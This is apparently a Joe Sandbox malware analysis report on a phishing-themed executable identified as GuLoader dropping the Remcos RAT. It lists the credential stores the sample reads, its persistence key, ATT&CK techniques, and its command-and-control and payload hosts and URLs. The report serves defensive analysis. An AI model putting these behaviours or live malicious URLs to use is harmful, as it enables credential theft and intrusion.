              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142933 cpuid 3_2_37142933
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_37142264
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,7_2_004082CD
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00403328 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403328
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2609800552.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4604168918.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 5712, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: ESMTPPassword7_2_004033F0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword7_2_00402DB3
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword7_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 5712, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 3568, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E5Y2QKJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2609800552.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4604168918.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 5712, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              11
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
              Masquerading
              LSA Secrets331
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566631 Sample: Quote Qu11262024.scr.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 29 myfreeenedd.ru 2->29 31 www.healthselflesssupplies.co.za 2->31 33 2 other IPs or domains 2->33 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Antivirus detection for URL or domain 2->51 53 14 other signatures 2->53 8 Quote Qu11262024.scr.exe 1 50 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\Local\...\System.dll, PE32 8->23 dropped 11 Quote Qu11262024.scr.exe 4 18 8->11         started        process6 dnsIp7 35 myfreeenedd.ru 66.63.187.246, 2404, 49785, 49792 ASN-QUADRANET-GLOBALUS United States 11->35 37 healthselflesssupplies.co.za 164.160.91.32, 443, 49769 ElitehostZA South Africa 11->37 39 geoplugin.net 178.237.33.50, 49793, 80 ATOM86-ASATOM86NL Netherlands 11->39 25 C:\Users\user\AppData\Local\...\Badrans.scr, PE32 11->25 dropped 27 C:\ProgramData\remcos\logs.dat, data 11->27 dropped 55 Detected Remcos RAT 11->55 57 Creates autostart registry keys with suspicious values (likely registry only malware) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Installs a global keyboard hook 11->61 16 Quote Qu11262024.scr.exe 1 11->16         started        19 Quote Qu11262024.scr.exe 1 11->19         started        21 Quote Qu11262024.scr.exe 2 11->21         started        file8 signatures9 process10 signatures11 41 Tries to steal Instant Messenger accounts or passwords 16->41 43 Tries to harvest and steal browser information (history, passwords, etc) 16->43 45 Tries to steal Mail credentials (via file / registry access) 19->45

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Quote Qu11262024.scr.exe53%ReversingLabsWin32.Trojan.GuLoader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr53%ReversingLabsWin32.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.bincd0%Avira URL Cloudsafe
              https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.bin0%Avira URL Cloudsafe
              https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.binS0%Avira URL Cloudsafe
              https://www.healthselflesssupplies.co.za/0%Avira URL Cloudsafe
              myfreeenedd.ru100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                high
                healthselflesssupplies.co.za
                164.160.91.32
                truefalse
                  unknown
                  myfreeenedd.ru
                  66.63.187.246
                  truetrue
                    unknown
                    www.healthselflesssupplies.co.za
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        high
                        https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.binfalse
                        • Avira URL Cloud: safe
                        unknown
                        myfreeenedd.rutrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpdQuote Qu11262024.scr.exe, 00000003.00000003.2587127492.0000000005D6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.office.com/bhv953.tmp.6.drfalse
                            high
                            http://www.imvu.comrQuote Qu11262024.scr.exe, 00000003.00000002.4635581411.0000000037110000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              http://geoplugin.net/json.gplQuote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.imvu.compDataQuote Qu11262024.scr.exe, 00000008.00000003.2620697668.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2621200234.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://aefd.nelreports.net/api/report?cat=bingthbhv953.tmp.6.drfalse
                                    high
                                    http://www.imvu.comQuote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2620697668.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2621200234.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://aefd.nelreports.net/api/report?cat=wsbbhv953.tmp.6.drfalse
                                        high
                                        http://www.nirsoft.netQuote Qu11262024.scr.exe, 00000006.00000002.2630407317.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                          high
                                          https://aefd.nelreports.net/api/report?cat=bingaotakbhv953.tmp.6.drfalse
                                            high
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv953.tmp.6.drfalse
                                              high
                                              https://deff.nelreports.net/api/report?cat=msnbhv953.tmp.6.drfalse
                                                high
                                                http://nsis.sf.net/NSIS_ErrorErrorQuote Qu11262024.scr.exefalse
                                                  high
                                                  https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.bincdQuote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comQuote Qu11262024.scr.exe, 00000003.00000002.4635581411.0000000037110000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.comQuote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorQuote Qu11262024.scr.exefalse
                                                        high
                                                        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv953.tmp.6.drfalse
                                                          high
                                                          https://www.healthselflesssupplies.co.za/Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aefd.nelreports.net/api/report?cat=bingaotbhv953.tmp.6.drfalse
                                                            high
                                                            https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv953.tmp.6.drfalse
                                                              high
                                                              https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.binSQuote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhv953.tmp.6.drfalse
                                                                high
                                                                https://www.google.com/accounts/serviceloginQuote Qu11262024.scr.exefalse
                                                                  high
                                                                  https://login.yahoo.com/config/loginQuote Qu11262024.scr.exefalse
                                                                    high
                                                                    http://www.nirsoft.net/Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv953.tmp.6.drfalse
                                                                        high
                                                                        http://www.ebuddy.comQuote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          164.160.91.32
                                                                          healthselflesssupplies.co.zaSouth Africa
                                                                          328037ElitehostZAfalse
                                                                          66.63.187.246
                                                                          myfreeenedd.ruUnited States
                                                                          8100ASN-QUADRANET-GLOBALUStrue
                                                                          178.237.33.50
                                                                          geoplugin.netNetherlands
                                                                          8455ATOM86-ASATOM86NLfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1566631
                                                                          Start date and time:2024-12-02 14:41:44 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 18s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:9
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Quote Qu11262024.scr.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 175
                                                                          • Number of non-executed functions: 327
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: Quote Qu11262024.scr.exe
                                                                          TimeTypeDescription
                                                                          08:43:48API Interceptor5188102x Sleep call for process: Quote Qu11262024.scr.exe modified
                                                                          14:43:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr
                                                                          14:43:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          164.160.91.32Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                              178.237.33.50RFQ_PX2_MULE2024_Travco_usering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              Beschwerde-AutoKauf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                              • geoplugin.net/json.gp
                                                                              Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                              • geoplugin.net/json.gp
                                                                              Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              geoplugin.netRFQ_PX2_MULE2024_Travco_usering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              Beschwerde-AutoKauf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                              • 178.237.33.50
                                                                              Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                              • 178.237.33.50
                                                                              Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ASN-QUADRANET-GLOBALUSsora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 154.205.102.33
                                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 104.200.67.193
                                                                              la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.230.140.211
                                                                              botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 199.180.254.132
                                                                              specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 155.94.253.4
                                                                              armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 193.111.248.45
                                                                              mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 193.111.248.45
                                                                              armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 193.111.248.45
                                                                              powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 193.111.248.45
                                                                              armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 193.111.248.45
                                                                              ATOM86-ASATOM86NLRFQ_PX2_MULE2024_Travco_usering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              Beschwerde-AutoKauf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                              • 178.237.33.50
                                                                              Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                              • 178.237.33.50
                                                                              Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              ElitehostZAPurchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 164.160.91.32
                                                                              https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                                                                              • 164.160.91.37
                                                                              https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6Get hashmaliciousUnknownBrowse
                                                                              • 164.160.91.31
                                                                              https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==Get hashmaliciousUnknownBrowse
                                                                              • 164.160.91.31
                                                                              http://www.fire.co.zaGet hashmaliciousUnknownBrowse
                                                                              • 164.160.91.17
                                                                              https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=Get hashmaliciousUnknownBrowse
                                                                              • 164.160.91.23
                                                                              https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                              • 164.160.91.23
                                                                              Q_u_a_r_a_nt_i_n_e A_l_e_r_t giovanni.busco RD6KUA46 648950657.emlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 164.160.91.37
                                                                              http://py.gm7ad.shishabuzz.co.za.#.aHR0cHM6Ly9sb2dpbi1taWNyb3NvZnRteWRvbWFpbnNjb20uZ2FzdG9yYWtlb3BhLmNvbS8/dXNlcm5hbWU9Z3JlZ29yeS53ZXN0QGFsZ29tYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 164.160.91.42
